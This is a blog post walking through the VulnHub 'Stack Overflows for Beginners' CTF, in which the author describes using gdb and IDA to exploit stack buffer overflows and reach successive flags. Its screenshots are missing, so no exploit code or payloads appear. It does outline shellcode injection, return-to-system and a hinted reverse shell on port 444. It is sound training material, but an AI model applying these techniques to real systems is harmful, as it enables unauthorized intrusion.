poniedziałek, 25 marca 2019

Stack Overflows for Beginners - CTF - part 1

When I was searching for some 'new VM' at VulnHub I saw that there is a "Stack Overflows for Beginners: 1" CTF. I decided to try it...
I was surprised whan I saw that we will start from... the Kali :)

According to 'readme page' we can start from level0 user. Let's do that:

Ok I think we should be a little bit 'familiar' with this desktop ;)

Let's start console window to find our target binary:

So far so good, let's run command file for the binary (sometimes you will use it during "other activities" as well ;)):

Ok, now I think it's time to open levelOne in gdb:

* before you'll do that, you can check in $HOME directory for .gdbinit file:

That's good. I also like to add set pagination off:

Ok I think we are ready to go:

Checking all call's should bring the idea of how it should be done.

I copied binary to my local Windows to check it in Ida:


As you can see you can change 'hex' (for uid) to decimal:

Right-click and click 'H':

Now, let's see this code:

 I think you are already familiar with 'those basics' ... ;) So (with bp set to strcpy - main+71 in my case):

So far so good.

Now, next guess:

Almost ;)

Cool but we are still level0 user (privs dropped?)

I decided to leave gdb and recreate steps in shell again:

Great! :) Now we are ready to get the flag (it will be our password for the next 'level'):


From now - if you want - you can (re)log in as  level1 user. We should be here, checking our new binary with file - like before:

So now (I again copied target binary to Ida) we should be somewhere here - function hello():

(As you can see I changed src to our_payload (click 'n' on variable or righclick to 'rename').)

Let's try this:

Ok, now back to Kali:

Now open it in gdb (and set bp to *main):

Now it should be easier. To find a string  for our system() function I used:
gdb> x/100s $esp

...after we started process with b *main. ;)


(x/200s worked better;))

Now we need to calculate:


(should be wrong because we're still using SHELL variable (in our address...), see below)

So, checking again:


Wrong. Again Neo.

Wrong. Again.

Good. Preparing to run without gdb:

(Let's say that 'during CTF') root shell means you won. But let's not cheat here. There are 3 more flags to grab:

Cool. Switching to user level2. We will start here:



Should be fun. :)


Hints from x/500wx $esp:


Ok. So I think we need to overflow variable with our new location (so BBBB becomes <start of our CCCC-shellcode-addr> and we will then be able to run 'shellcode'...).

To generate my 'sample shellcode' I used my old script:




Checking again:

Now looks good. Let's check the address of our shellcode again:

After little rewrite ;) we can try x/300wx $esp again:

Again. :)

...but maybe this time I will open that 444/tcp port on my Kali box? ;)

Looks better. ;]

I think it's enough for the 'part 1' of this CTF. We need to check what's going on with those last 2 flags so stay tuned... ;)

See you next time.


(Updated at 25.03.2019 @23:30)

Ok, it's time for some updated (I decided to add those last 2 challenges here, not in the new post, so...) ;)

Let's start here - levelFour:


Now we are here, preparing our payload:




Cool :) Last stage (because we 'already got root' ;))

Next, get the flag:

Cool. Time to check the binary:

I used shellcode from shell-storm.org - thanks! - when I saw gets() it reminded me one CTF I played in the past:



 Rewriting payload:

Next, I rewrited my payload (few more times... ;))

 ...and again...

I decided to use this address:

And the reason is:

Cool :) I think it was very nice CTF. You should try it :)

See you next time!


Brak komentarzy:

Prześlij komentarz